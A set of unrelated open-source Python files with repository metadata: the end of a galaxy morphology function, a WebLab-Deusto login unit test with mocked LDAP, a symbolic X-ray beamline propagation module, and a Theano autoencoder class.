if np.isnan(ASY) or np.isinf(ASY):
ASY = 9999
if np.isnan(ASY_ERROR) or np.isinf(ASY_ERROR):
ASY_ERROR = 9999
if np.isnan(S) or np.isinf(S):
S = 9999
if np.isnan(ERROR_SMOO) or np.isinf(ERROR_SMOO):
ERROR_SMOO = 9999
if np.isnan(gini_coef[0]) or np.isinf(gini_coef[0]):
Gini_Coef = 9999
else:
Gini_Coef = gini_coef[0]
if np.isnan(gini_coef[5]) or np.isinf(gini_coef[5]):
M20_coef = 9999
else:
M20_coef = float(gini_coef[5])
return con.concen, con.error_con, ASY, ASY_ERROR, S, ERROR_SMOO, \
Gini_Coef, M20_coef
#CasGm('n5585_lR.fits', 'BMask.fits', 192.03, 157.42, 40.0, 40.0, 0.0, 0.0, 0.0)
|
vvinuv/pymorph
|
pymorph/casgm.py
|
Python
|
gpl-2.0
| 13,953
|
[
"Galaxy"
] |
84f72f08402ef0e80f1100ea07bdabdc40809dad33a16105753a21de96246fb5
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005 onwards University of Deusto
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# This software consists of contributions made by many individuals,
# listed below:
#
# Author: Pablo Orduña <pablo@ordunya.com>
#
from __future__ import print_function, unicode_literals
from __future__ import with_statement
import sys
import unittest
import mocker
import time
try:
import ldap
except ImportError:
LDAP_AVAILABLE = False
else:
LDAP_AVAILABLE = True
from voodoo.sessions.session_id import SessionId
from voodoo.gen import CoordAddress
import voodoo.configuration as ConfigurationManager
import weblab.core.login.manager as login_manager
from weblab.core.server import UserProcessingServer
import weblab.core.server as core_api
import weblab.core.login.simple.ldap_auth as ldap_auth
import weblab.core.login.exc as LoginErrors
import test.unit.configuration as configuration_module
from test.util.wlcontext import wlcontext
fake_wrong_user = "fake_wrong_user"
fake_wrong_passwd = "fake_wrong_passwd"
fake_right_user = "student1"
fake_right_passwd = "password"
fake_ldap_user = "studentLDAP1"
fake_ldap_passwd = "password"
fake_ldap_invalid_passwd = "fake_ldap_invalid_passwd"
class LoginServerTestCase(unittest.TestCase):
def setUp(self):
coord_address = CoordAddress.translate(
"server0:instance0@machine0")
self.cfg_manager = ConfigurationManager.ConfigurationManager()
self.cfg_manager.append_module(configuration_module)
self.core_server = UserProcessingServer(coord_address, None, self.cfg_manager)
def tearDown(self):
self.core_server.stop()
def test_invalid_user_and_invalid_password(self):
login_manager.LOGIN_FAILED_DELAY = 0.2
with wlcontext(self.core_server):
self.assertRaises(
LoginErrors.InvalidCredentialsError,
core_api.login,
fake_wrong_user,
fake_wrong_passwd
)
def test_valid_user_and_invalid_password(self):
login_manager.LOGIN_FAILED_DELAY = 0.2
with wlcontext(self.core_server):
self.assertRaises(
LoginErrors.InvalidCredentialsError,
core_api.login,
fake_right_user,
fake_wrong_passwd
)
@unittest.skipIf(not LDAP_AVAILABLE, "LDAP module not available")
def test_ldap_user_right(self):
mockr = mocker.Mocker()
ldap_auth._ldap_provider.ldap_module = mockr.mock()
with wlcontext(self.core_server):
session_id = core_api.login(fake_ldap_user, fake_ldap_passwd)
self.assertTrue( isinstance(session_id, SessionId) )
self.assertTrue( len(session_id.id) > 5 )
@unittest.skipIf(not LDAP_AVAILABLE, "LDAP module not available")
def test_ldap_user_invalid(self):
mockr = mocker.Mocker()
ldap_object = mockr.mock()
ldap_object.simple_bind_s(fake_ldap_user + '@cdk.deusto.es', fake_ldap_invalid_passwd)
mockr.throw(ldap.INVALID_CREDENTIALS)
ldap_module = mockr.mock()
ldap_module.initialize('ldaps://castor.cdk.deusto.es')
mockr.result(ldap_object)
ldap_auth._ldap_provider.ldap_module = ldap_module
with wlcontext(self.core_server):
with mockr:
self.assertRaises(
LoginErrors.InvalidCredentialsError,
core_api.login,
fake_ldap_user,
fake_ldap_invalid_passwd
)
def test_login_delay(self):
login_manager.LOGIN_FAILED_DELAY = 0.2
#Sometimes it's 0.999323129654
#0.001 should be ok, but just in case
ERROR_MARGIN = 0.01
start_time = time.time()
with wlcontext(self.core_server):
self.assertRaises(
LoginErrors.InvalidCredentialsError,
core_api.login,
fake_wrong_user,
fake_wrong_passwd
)
finish_time = time.time()
self.assertTrue((finish_time + ERROR_MARGIN - start_time) >= login_manager.LOGIN_FAILED_DELAY)
def test_right_session(self):
with wlcontext(self.core_server):
session_id = core_api.login(fake_right_user, fake_right_passwd)
self.assertTrue( isinstance(session_id, SessionId) )
self.assertTrue( len(session_id.id) > 5 )
def suite():
return unittest.makeSuite(LoginServerTestCase)
if __name__ == '__main__':
unittest.main()
|
morelab/weblabdeusto
|
server/src/test/unit/weblab/login/test_server.py
|
Python
|
bsd-2-clause
| 4,780
|
[
"CDK"
] |
237f74a878e2c3b65f7a3930eb628cee39fb17fb4a184835a4b78ec2b1105648
|
import numpy as np
from numpy import exp
from numpy import pi
from numpy import sqrt
from numpy import log
import numpy.testing as nut
import scipy.integrate as si
import mpmath as mp
import sympy as sp
import matplotlib.pylab as plt
# This file is only there to be able to see the source functions IXXP and IYYP once the propagation is over
x, xp, y, yp, dl = sp.symbols('x xp y yp dl')
#DEFINITION OF MATHEMATICAL OBJECTS
#Definition of the transformation matrices
def matrixFlightSymbolic(L): # For a flight path of length
return np.array([[1,-L,0],[0,1,0],[0,0,1]])
def matrixMonoPlaneSymbolic(b, ThetaB): # For a perfect flat crystal monochromator
return np.array([[b,0,0],[0,1/b,(1-1/b)*np.tan(ThetaB)],[0,0,1]])
def matrixMonoBentSymbolic(b, Fc, ThetaB): # For a perfect curved crystal monochromator (meridionally and sagitally focusing)
return np.array([[b,0,0],[1/Fc,1/b,(1-1/b)*np.tan(ThetaB)],[0,0,1]])
def matrixMonoMosaicSymbolic(ThetaB): # For a mosaic monochromator
return np.array([[1,0,0],[0,-1,2*np.tan(ThetaB)],[0,0,1]])
def matrixMirrorPlaneSymbolic(IncAng, Sigma, Lambda, Delta): # For the plane mirror
return exp(-(4*pi*np.sin(IncAng)*Sigma/Lambda)**2)*np.array([[1,0,0],[Delta,1,0],[0,0,1]])
def matrixMirrorSymbolic(IncAng, Sigma, Lambda, Delta, Fm, S): # For the bent and toroidal mirrors
return exp(-(4*pi*np.sin(IncAng)*Sigma/Lambda)**2)*np.array([[1,0,0],[(1+S*Fm*Delta)/Fm,1,0],[0,0,1]])
def matrixCompLensParaSymbolic(F): # For the compound refractive lenses with parabolic holes
return np.array([[1,0,0],[1/F,1,0],[0,0,1]])
def matrixCompLensCircSymbolic(Coef, F): # For the compound refractive lenses with circular holes
return np.array([[1,0,0],[Coef/F,1,0],[0,0,1]])
def matrixMultilayerSymbolic(Fmu): # For the multilayer
return np.array([[1,0,0],[1/Fmu,1,0],[0,0,1]])
#Definition of the beam source
def sourceXXPSymbolic(x, xp, SigmaXSource, SigmaXPSource):
return sp.exp(-( (x/SigmaXSource)**2 + (xp/SigmaXPSource)**2) / 2 )
def sourceYYPSymbolic(y, yp, SigmaYSource, SigmaYPSource, GammaSource):
return sp.exp( -( (y/SigmaYSource)**2 + ((yp-GammaSource*y)/SigmaYPSource)**2)/2 )
def sourceLambdaSymbolic(dl, SigmaSLambda):
return sp.exp(-dl**2/2/SigmaSLambda**2)
#Definition of the acceptance windows of the optical parts
def cotanSymbolic(x):
return 1/np.tan(x)
def acceptanceSlitSymbolic(y, Aperture, calctype): #Slit acceptance
if calctype==0:
return sqrt(6/pi) / sqrt(6*log(2)/pi) * sp.exp( -(y/Aperture)**2/2*12)
if calctype==1:
return 1/sqrt(6*log(2)/pi)*sp.exp(-y**2/(2*Aperture**2/2/pi))
else:
return 'the value for calctype is 0 or 1 you pipsqueak !'
def acceptancePinSymbolic(y, Diameter): #Pinhole acceptance
return sqrt(8/pi) * sp.exp ( -(y/Diameter)**2/2*16 )
def acceptanceAngleMonoPlaneSymbolic(yp, DeltaLambda, ThetaB, Wd, RMono, RInt): #Plane monochromator angle acceptance
return RMono*RInt*sqrt(6/pi)/Wd * sp.exp( -(yp-DeltaLambda*np.tan(ThetaB))**2 / (2*Wd**2/12))
def acceptanceWaveMonoPlaneSymbolic(DeltaLambda, SigmaYp, ThetaB, Wd): #Plane monochromator wave acceptance
return sqrt(6/pi) * sp.exp( - (DeltaLambda)**2 / (2*(SigmaYp**2+Wd**2/12)*cotanSymbolic(ThetaB)**2) )
def acceptanceAngleMonoMosaicSymbolic(yp, DeltaLambda, ThetaB, eta, RInt): #Mosaic monochromator angular acceptance
return RInt*sqrt(6/pi)/eta * sp.exp(- (yp-DeltaLambda*np.tan(ThetaB))**2 / eta**2 /2 )
def acceptanceWaveMonoMosaicSymbolic(DeltaLambda, SigmaYp, ThetaB, eta): #Mosaic monochromator wave acceptance
return sqrt(6/pi) * sp.exp( - (DeltaLambda)**2 / 2 /((SigmaYp**2+eta**2)*cotanSymbolic(ThetaB)**2))
def acceptanceAngleMonoBentSymbolic(y, yp, DeltaLambda, Alpha, ThetaB, Wd, r, RMono, RInt): #Curved monochromator angle acceptance
return RMono*RInt*sqrt(6/pi)/Wd * sp.exp( - (yp-y/r/np.sin(ThetaB+Alpha)-DeltaLambda*np.tan(ThetaB))**2/(2*Wd**2/12))
def acceptanceWaveMonoBentSymbolic(DeltaLambda, ThetaB, DistanceFromSource, Wd, SigmaSource): #Curved monochromator wave acceptance
return sqrt(6/pi) * sp.exp( -(DeltaLambda)**2 / (2*cotanSymbolic(ThetaB)**2*((SigmaSource/DistanceFromSource)**2+Wd**2/12)) )
def acceptanceCompLensParaSymbolic(x, Radius, Distance, Sigma): #Compound refractive lense with parabolic holes acceptance
return sp.exp( -(x**2+Radius*Distance)/2/Sigma**2)
def acceptanceCompLensCircSymbolic(x, Radius, Distance, Sigma, FWHM): #Compound refractive lense with circular holes acceptance
return sp.exp( -x**2/2/Sigma**2 -x**2*FWHM**2/8/Radius**2/Sigma**2 -x**2*FWHM**4/16/Sigma**2/Radius**4 -Radius*Distance/2/Sigma**2 )
def acceptanceAngleMultiSymbolic(y, yp, DeltaLambda, ThetaML, Rml, Rowland, Ws): #Multilayer angle acceptance
return Rml*8/3*sqrt(log(2)/pi) * sp.exp( -(-yp-y/Rowland/np.sin(ThetaML)-DeltaLambda*np.tan(ThetaML))**2*8*log(2)/2/Ws**2 )
def acceptanceWaveMultiSymbolic(DeltaLambda, ThetaML, DistanceFromSource, Ws, SigmaSource): #Multilayer wave acceptance
return sqrt(6/pi) * sp.exp( -(DeltaLambda)**2/2/((SigmaSource/DistanceFromSource)**2+Ws**2/8/log(2))/cotanSymbolic(ThetaML)**2)
# Useful functions for the calculation part
def buildMatTabSymbolic(ListObject, ListDistance):
n = len(ListObject)
if ListDistance == []:
return 'Error, ListDistance is empty'
else :
MatTabX = [ListDistance[0]]
MatTabY = [ListDistance[0]]
if n == 0:
return [MatTabX, MatTabY]
else :
for k in range(n):
MatTabX.append(ListObject[k][-1])
MatTabX.append(matrixFlightSymbolic(ListDistance[k+1]))
MatTabY.append(ListObject[k][-2])
MatTabY.append(matrixFlightSymbolic(ListDistance[k+1]))
return [MatTabX, MatTabY]
def propagateMatrixListSymbolic(x, xp, y, yp, dl, SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, GammaSource, MatTabX, MatTabY, ListObject, bMonoX, bMonoY):
# initiating variables, copies of the arrays are created
MX = MatTabX.copy()
MY = MatTabY.copy()
MatTempX = np.array([x, xp, dl])
MatTempY = np.array([y, yp, dl])
# the case of single propagation has to be done separately because of a pb of range
if len(MX)==1:
MatTempX = np.dot(MX[0], MatTempX)
MatTempY = np.dot(MY[0], MatTempY)
NewSourceX = sourceXXPSymbolic(MatTempX[0], MatTempX[1], SigmaXSource, SigmaXPSource)
NewSourceY = sourceYYPSymbolic(MatTempY[0], MatTempY[1], SigmaYSource, SigmaYPSource, GammaSource)
# now we do the general case
else :
#first matrix multiplication
for i in range(len(MX)-1, -1, -1):
MatTempX = np.dot(MX[i], MatTempX)
MatTempY = np.dot(MY[i], MatTempY)
NewSourceX = sourceXXPSymbolic(MatTempX[0], MatTempX[1], SigmaXSource, SigmaXPSource)
NewSourceY = sourceYYPSymbolic(MatTempY[0], MatTempY[1], SigmaYSource, SigmaYPSource, GammaSource)
del MX[0]
del MY[0]
k = 0
#we are going to do our matrix product, then apply the acceptance if needed and calculate the new resulting
# source. Once this is done, we erase the two first matrices and do this again until our arrays are empty
while MX!=[] and MY!=[]:
for i in range(len(MX)-1,-1,-1):
MatTempX = np.array([x, xp, dl])
MatTempY = np.array([y, yp, dl])
MatTempX = np.dot(MX[i],MatTempX)
MatTempY = np.dot(MY[i], MatTempY)
if ListObject[k][0] == 'Slit':
NewSourceX = NewSourceX * acceptanceSlitSymbolic(MatTempX[0], ListObject[k][1], ListObject[k][3])
NewSourceY = NewSourceY * acceptanceSlitSymbolic(MatTempY[0], ListObject[k][2], ListObject[k][3])
elif ListObject[k][0] == 'Pinhole' :
NewSourceX = NewSourceX * acceptancePinSymbolic(MatTempX[0], ListObject[k][1])
NewSourceY = NewSourceY * acceptancePinSymbolic(MatTempX[0], ListObject[k][1])
elif ListObject[k][0] == 'MonoPlaneVertical':
NewSourceY = NewSourceY * acceptanceAngleMonoPlaneSymbolic(MatTempY[1], MatTempY[2], ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4])
NewSourceY = NewSourceY * acceptanceWaveMonoPlaneSymbolic(MatTempY[2], bMonoY*SigmaYPSource, ListObject[k][1], ListObject[k][2])
elif ListObject[k][0] == 'MonoPlaneHorizontal':
NewSourceX = NewSourceX * acceptanceAngleMonoPlaneSymbolic(MatTempX[1], MatTempX[2], ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4])
NewSourceX = NewSourceX * acceptanceWaveMonoPlaneSymbolic(MatTempX[2], bMonoX*SigmaXPSource, ListObject[k][1], ListObject[k][2])
elif ListObject[k][0] == 'MultiHorizontal':
NewSourceX = NewSourceX * acceptanceAngleMultiSymbolic(MatTempX[0], MatTempX[1], MatTempX[2], ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4])
NewSourceX = NewSourceX * acceptanceWaveMultiSymbolic(MatTempX[2], ListObject[k][1], ListObject[k][5], ListObject[k][4], SigmaXSource)
elif ListObject[k][0] == 'MultiVertical' :
NewSourceY = NewSourceY * acceptanceAngleMultiSymbolic(MatTempY[0], MatTempY[1], MatTempY[2], ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4])
NewSourceY = NewSourceY * acceptanceWaveMultiSymbolic(MatTempY[2], ListObject[k][1], ListObject[k][5], ListObject[k][4], SigmaYSource)
elif ListObject[k][0] == 'MonoBentHorizontal':
NewSourceX = NewSourceX * acceptanceAngleMonoBentSymbolic(MatTempX[0], MatTempX[1], MatTempX[2], ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4], ListObject[k][5], ListObject[k][6])
NewSourceX = NewSourceX * acceptanceWaveMonoBentSymbolic(MatTempX[2], ListObject[k][2], ListObject[k][7], ListObject[k][3], SigmaXSource)
elif ListObject[k][0] == 'MonoBentVertical' :
NewSourceY = NewSourceY * acceptanceAngleMonoBentSymbolic(MatTempY[0], MatTempY[1], MatTempY[2],ListObject[k][1], ListObject[k][2], ListObject[k][3], ListObject[k][4], ListObject[k][5], ListObject[k][6])
NewSourceY = NewSourceY * acceptanceWaveMonoBentSymbolic(MatTempY[2], ListObject[k][2], ListObject[k][7], ListObject[k][3], SigmaXSource)
elif ListObject[k][0] == 'MonoMosaicHorizontal':
NewSourceX = NewSourceX * acceptanceAngleMonoMosaicSymbolic(MatTempX[1], MatTempX[2], ListObject[k][1], ListObject[k][2], ListObject[k][3])
NewSourceX = NewSourceX * acceptanceWaveMonoMosaicSymbolic(MatTempX[2], SigmaXPSource, ListObject[k][1], ListObject[k][2])
elif ListObject[k][0] == 'MonoMosaicVertical' :
NewSourceY = NewSourceY * acceptanceAngleMonoMosaicSymbolic(MatTempY[1], MatTempY[2], ListObject[k][1], ListObject[k][2], ListObject[k][3])
NewSourceY = NewSourceY * acceptanceWaveMonoMosaicSymbolic(MatTempY[2], SigmaYPSource, ListObject[k][1], ListObject[k][2])
elif ListObject[k][0] == 'LensParabolicHorizontal':
NewSourceX = NewSourceX * acceptanceCompLensParaSymbolic(MatTempX[0], ListObject[k][1], ListObject[k][2],
ListObject[k][3])
elif ListObject[k][0] == 'LensParabolicVertical':
NewSourceY = NewSourceY * acceptanceCompLensParaSymbolic(MatTempY[0], ListObject[k][1], ListObject[k][2],
ListObject[k][3])
elif ListObject[k][0] == 'LensParabolic2D':
NewSourceX = NewSourceX * acceptanceCompLensParaSymbolic(MatTempX[0], ListObject[k][1], ListObject[k][2],
ListObject[k][3])
NewSourceY = NewSourceY * acceptanceCompLensParaSymbolic(MatTempY[0], ListObject[k][1], ListObject[k][2],
ListObject[k][3])
elif ListObject[k][0] == 'LensIdeal2D':
pass
elif ListObject[k][0] == 'LensIdealHorizontal':
pass
elif ListObject[k][0] == 'LensIdealVertical':
pass
elif ListObject[k][0] == 'Mirror':
pass
else:
raise Exception("Wrong element name")
k = k +1
del MX[0:2]
del MY[0:2]
return [NewSourceX, NewSourceY]
def sourceFinaleSymbolic(SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, SigmaSLambda, GammaSource, MatTabX, MatTabY, ListObject, SourceI, bMonoX, bMonoY):
# IXXP = lambda x, xp, dl : propagateMatrixList(x, xp, 0, 0, dl, SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, GammaSource, MatTabX, MatTabY, ListObject, bMonoX, bMonoY)[0]
# IYYP = lambda y, yp, dl : propagateMatrixList(0, 0, y, yp, dl, SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, GammaSource, MatTabX, MatTabY, ListObject, bMonoX, bMonoY)[1]
# ISigma = lambda dl : sourceLambda(dl, SigmaSLambda) * SourceI
IXXP = propagateMatrixListSymbolic(x, xp, 0, 0, dl, SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, GammaSource, MatTabX, MatTabY, ListObject, bMonoX, bMonoY)[0]
IYYP = propagateMatrixListSymbolic(0, 0, y, yp, dl, SigmaXSource, SigmaXPSource, SigmaYSource, SigmaYPSource, GammaSource, MatTabX, MatTabY, ListObject, bMonoX, bMonoY)[1]
ISigma = sourceLambdaSymbolic(dl, SigmaSLambda) * SourceI
return IXXP,IYYP, ISigma
|
Evenity/py_psa
|
py_psa/psa_functions_symbolic.py
|
Python
|
mit
| 14,345
|
[
"CRYSTAL"
] |
287efb6e0414c7f3419ec5cc1e09cf8edd0e01b771df9f11d2cf51c76448654d
|
"""
.. module::
:platform: Unix
:synopsis: This module contains the Autoencoder class definition.
.. moduleauthor: Jan Hajic <hajicj@gmail.com>
"""
import cPickle
import numpy
import theano
import theano.tensor as TT
from theano.tensor.shared_randomstreams import RandomStreams
from safire.learning.models.base_unsupervised_model import BaseUnsupervisedModel
class Autoencoder(BaseUnsupervisedModel):
"""The Autoencoder model.
Optimizes reconstruction error with a cross-entropy loss function.
"""
def __init__(self, inputs, n_in, n_out=100,
activation=TT.nnet.sigmoid,
backward_activation=TT.nnet.sigmoid,
reconstruction='cross-entropy',
W=None, W_prime=None, b=None, b_prime=None,
tied_weights=True,
L1_norm=0.0, L2_norm=0.0, bias_decay=0.0,
sparsity_target=None, output_sparsity_target=None,
rng=numpy.random.RandomState(),
theano_rng=None):
"""Initialize the parameters of the Autoencoder.
An Autoencoder is an unsupervised model that tries to minimize
reconstruction error on input.
:type inputs: theano.tensor.TensorType
:param inputs: Symbolic variable that descripbes the input
of the architecture (e.g., one minibatch of
input images, or output of a previous layer)
:type n_in: int
:param n_in: Number of input units, the dimension of the space
in which the data points live
:type n_out: int
:param n_out: The number of output/hidden units.
:type activation: theano.tensor.elemwise.Elemwise
:param activation: The nonlinearity applied at neuron
output.
:type reconstruction: str
:param reconstruction: Which reconstruction cost to use. Accepts
``cross-entropy`` and ``mse`` (for Mean Squared Error).
:type W: theano.tensor.sharedvar.TensorSharedVariable
:param W: Theano variable pointing to a set of weights that should
be shared between the autoencoder and another architecture;
if autoencoder should be standalone, leave this as None.
This set of weights refers to the transition from visible
to hidden layer.
:type W_prime: theano.tensor.sharedvar.TensorSharedVariable
:param W_prime: Theano variable pointing to a set of weights that
should be shared between the autoencoder and another
architecture; if autoencoder should be standalone,
leave this as None. This set of weights refers to
the transition from the hidden to the visible layer.
:type b: theano.tensor.sharedvar.TensorSharedVariable
:param b: Theano variable pointing to a set of bias values that
should be shared between the autoencoder and another
architecture; if autoencoder should be standalone,
leave this as None. This set of bias values refers
to the transition from visible to hidden layer.
:type b_prime: theano.tensor.sharedvar.TensorSharedVariable
:param b_prime: Theano variable pointing to a set of bias values
that should be shared between the autoencoder and
another architecture; if autoencoder should be
standalone, leave this as None. This set of bias
values refers to the transition from visible to
hidden layer.
:type tied_weights: bool
:param tied_weights: If True (default), forces W_prime = W.T, i.e.
the visible-hidden transformation and the
hidden-visible transformation use the same
weights.
:type sparsity_target: float
:param sparsity_target: The target mean for features. If set, incurs
a sparsity penalty: the KL divergence of a unit being either off,
or on.
:type output_sparsity_target: float
:param output_sparsity_target: The sparsity target for output vectors
instead of features.
:type L1_norm: float
:param L1_norm: L1 regularization weight (absolute value of each
parameter).
:type L2_norm: float
:param L2_norm: L2 regularization weight (quadratic value of each
parameter).
:type bias_decay: float
:param bias_decay: Adds an extra L2 penalty on the bias terms.
"""
super(Autoencoder, self).__init__(inputs, n_in, n_out)
self.activation = activation
self.backward_activation = backward_activation
self.tied_weights = tied_weights # Bookkeeping, basically.
self.reconstruction = reconstruction
self.L1_norm = L1_norm
self.L2_norm = L2_norm
self.bias_decay = bias_decay
self.sparsity_target = sparsity_target
self.output_sparsity_target = output_sparsity_target
if not W:
W = self._init_weights('W', (n_in, n_out), rng)
else: # Check for consistency in supplied weights
self._init_param_consistency_check(W, (n_in, n_out))
self.W = W
# W_prime needs different behavior for tied_weights=True/False
self.W_prime = None
if tied_weights is True:
self.W_prime = self.W.T
else:
if not W_prime:
W_prime = self._init_weights('W_prime', (n_out, n_in), rng)
else: # Check for consistency of supplied weights
self._init_param_consistency_check(W_prime, (n_out, n_in))
self.W_prime = W_prime
if not b:
b = self._init_bias('b', n_out, rng)
else: # Check for consistency in supplied weights
self._init_param_consistency_check(b, (n_out,))
self.b = b
if not b_prime:
# initialize the biases b as a vector of n_out 0s
b_prime = self._init_bias('b_prime', n_in, rng)
else: # Check for consistency in supplied weights
self._init_param_consistency_check(b_prime, (n_in,))
self.b_prime = b_prime
# Different params for tied weights!
# This will be difficult to put in a general method.
self.params = [self.W, self.b, self.b_prime]
if not self.tied_weights:
self.params.append(self.W_prime)
# Compatibility of interface
self.outputs = self.activation(TT.dot(inputs, self.W) + self.b)
if theano_rng is None:
theano_rng = RandomStreams(rng.randint(2 ** 30))
self.theano_rng = theano_rng
def _init_args_snapshot(self):
"""Saves the model in the form of an init kwarg dict, since not all
attributes of the instance can be pickled. Upon loading, the saved
model kwarg dict will be used as ``**kwargs`` (the ``load`` method
is a classmethod) for an initialization of the model."""
init_arg_dict = {
'W' : self.W,
'W_prime' : self.W_prime,
'b' : self.b,
'b_prime' : self.b_prime,
'n_in' : self.n_in,
'n_out' : self.n_out,
'activation' : self.activation,
'tied_weights' : self.tied_weights,
'inputs' : self.inputs,
'reconstruction' : self.reconstruction,
'L1_norm': self.L1_norm,
'L2_norm': self.L2_norm,
'bias_decay': self.bias_decay,
'sparsity_target': self.sparsity_target,
'output_sparsity_target': self.output_sparsity_target,
# Random number generators are ignored?
}
return init_arg_dict
def mean_h_given_v(self, inputs):
"""Computes the activation of the hidden units.
:type inputs: theano.tensor.TensorType
:param inputs: Values of the visible units (i.e. rows of data).
:returns: The activation on hidden units, as symbolic expression
bound to ``inputs``.
"""
return self.activation(TT.dot(inputs, self.W) + self.b)
def mean_v_given_h(self, hidden_values):
"""Computes the activation of the visible units on reconstruction.
:type hidden_values: theano.tensor.TensorType
:param hidden_values: Values of the hidden units.
:returns: The activation on visible units, as symbolic expression
bound to ``hidden_values``. This is the reconstructed activation.
"""
return self.backward_activation(TT.dot(hidden_values, self.W_prime) + self.b_prime)
def sample_v_given_h(self, hidden):
"""Samples the visible layer given the hidden layer."""
mean_v = self.activation(TT.dot(hidden, self.W_prime) + self.b_prime)
sample_v = self.theano_rng.binomial(size=mean_v.shape,
n=1, p=mean_v,
dtype=theano.config.floatX)
return sample_v
def sample_h_given_v(self, visible):
"""Samples the hidden layer given the visible layer."""
mean_h = self.backward_activation(TT.dot(visible, self.W) + self.b)
sample_h = self.theano_rng.binomial(size=mean_h.shape,
n=1, p=mean_h,
dtype=theano.config.floatX)
return sample_h
def sample_vhv(self, visible):
"""Performs one Gibbs sampling step from visible to visible layer."""
return self.sample_v_given_h(self.sample_h_given_v(visible))
def sample_hvh(self, hidden):
"""Performs one Gibbs sampling step from hidden to hidden layer."""
return self.sample_h_given_v(self.sample_v_given_h(hidden))
def _reconstruction_cross_entropy(self, X):
"""Computes the reconstruction cross-entropy on X.
:type X: theano.tensor.TensorType
:param X: A training batch. In comparison to a supervised model,
which computes cost on some response vector, the
unsupervised model has to compute cost on the inputs.
:returns: The reconstruction cross-entropy on X, as a number.
"""
activation_hidden = self.mean_h_given_v(X)
activation_visible = self.mean_v_given_h(activation_hidden)
return -TT.sum(X * TT.log(activation_visible) + (1 - X)
* TT.log(1 - activation_visible), axis=1)
# A -TT.sum(...) here; should the negative really be
# there or not?
def _reconstruction_squared_error(self, X):
"""Computes the reconstruction squared error on X.
:type X: theano.tensor.TensorType
:param X: A training batch. In comparison to a supervised model,
which computes cost on some response vector, the
unsupervised model has to compute cost on the inputs.
:returns: The reconstruction squared error on X, as a number.
"""
activation_hidden = self.mean_h_given_v(X)
activation_visible = self.mean_v_given_h(activation_hidden)
return (activation_visible - X) ** 2
def _reconstruction_hypercubic_exploded_error(self, X):
"""Computes the reconstruction hypercubic (to the power of 4) error
and multiplies it by a significant number."""
activation_hidden = self.mean_h_given_v(X)
activation_visible = self.mean_v_given_h(activation_hidden)
return 10.0 * ((activation_visible - X) ** 10)
def error(self, X):
"""Returns the mean reconstruction cross-entropy on X.
This is the same number which is used for model cost to optimize
in gradient descent, since without gold-standard data, we have
nothing to really compute any error on. So, validation and
testing can use this function in guarding against overfitting.
:type X: theano.tensor.TensorType
:param X: A training batch. In comparison to a supervised model,
which computes cost on some response vector, the
unsupervised model has to compute cost on the inputs.
:returns: The reconstruction cross-entropy (as a number)
"""
return self._cost(X)
# if self.reconstruction == 'cross-entropy':
# return TT.mean(self._reconstruction_cross_entropy(X))
# elif self.reconstruction == 'mse':
# return TT.mean(self._reconstruction_squared_error(X))
# elif self.reconstruction == 'exaggerated-mse':
# return TT.mean(self._reconstruction_hypercubic_exploded_error(X))
# else:
# raise ValueError('Invalid reconstruction set! %s' % self.reconstruction)
def _cost(self, X):
"""Returns the mean reconstruction cross-entropy on X.
This is the same number which is used for model error.
:type X: theano.tensor.TensorType
:param X: A training batch. In comparison to a supervised model,
which computes cost on some response vector, the
unsupervised model has to compute cost on the inputs.
:returns: The reconstruction cross-entropy (as a number)
"""
if self.reconstruction == 'cross-entropy':
cost = TT.mean(self._reconstruction_cross_entropy(X))
elif self.reconstruction == 'mse':
cost = TT.mean(self._reconstruction_squared_error(X))
elif self.reconstruction == 'exaggerated-mse':
cost = TT.mean(self._reconstruction_hypercubic_exploded_error(X))
else:
raise ValueError('Invalid reconstruction set! %s' % self.reconstruction)
if self.L1_norm != 0.0:
cost += (TT.sqrt(TT.sum(self.W ** 2))
+ TT.sqrt(TT.sum(self.W_prime ** 2))
+ TT.sqrt(TT.sum(self.b ** 2))
+ TT.sqrt(TT.sum(self.b_prime ** 2))) * self.L1_norm
if self.L2_norm != 0.0:
cost += (TT.sum(self.W ** 2) + TT.sum(self.W_prime ** 2)
+ TT.sum(self.b ** 2) + TT.sum(self.b_prime ** 2)) \
* self.L2_norm
if self.bias_decay != 0.0:
cost += (TT.sum(self.b ** 2) + TT.sum(self.b_prime ** 2)) \
* self.bias_decay
if self.sparsity_target is not None:
cost += self._sparsity_cross_entropy(X)
if self.output_sparsity_target is not None:
print 'Setting output sparsity target: {0}'.format(self.output_sparsity_target)
cost += self._output_sparsity_cross_entropy(X)
return cost
def _sparsity_cross_entropy(self, X):
"""
Computes the KL divergence of distribution of the sparsity target
w.r.t. mean activation of each hidden neuron.
:param X: The input data batch.
:return: The KL-divergence... (see desc.)
"""
mean_act = TT.mean(self.activation(TT.dot(X, self.W) + self.b),
axis=0)
rho_term = mean_act * TT.log(mean_act / self.sparsity_target)
mean_act_compl = 1.0 - mean_act
neg_rho_term = mean_act_compl * TT.log(mean_act_compl /
(1.0 - self.sparsity_target))
kl_divergence = TT.sum(rho_term + neg_rho_term)
return kl_divergence
def _output_sparsity_cross_entropy(self, X):
"""
Computes the KL divergence of distribution of the sparsity target
w.r.t. mean activation of each hidden neuron.
:param X: The input data batch.
:return: The KL-divergence... (see desc.)
"""
mean_act = TT.mean(self.activation(TT.dot(X, self.W) + self.b),
axis=1)
rho_term = mean_act * TT.log(mean_act / self.output_sparsity_target)
mean_act_compl = 1.0 - mean_act
neg_rho_term = mean_act_compl * TT.log(mean_act_compl /
(1.0 - self.output_sparsity_target))
kl_divergence = TT.sum(rho_term + neg_rho_term)
return kl_divergence
@classmethod
def _init_args(cls): # This method will get obsolete.
"""Returns a list of the required kwargs the class needs to be
successfully initialized.
Only returns args that are OVER the minimum defined in the
BaseModel.__init__() function definition.
.. warn::
This method and its role is subject to change; it may also
be removed entirely.
:returns: A list of strings: ``['n_out', 'activation', 'rng']``
"""
return ['n_out', 'activation', 'rng', 'reconstruction']
|
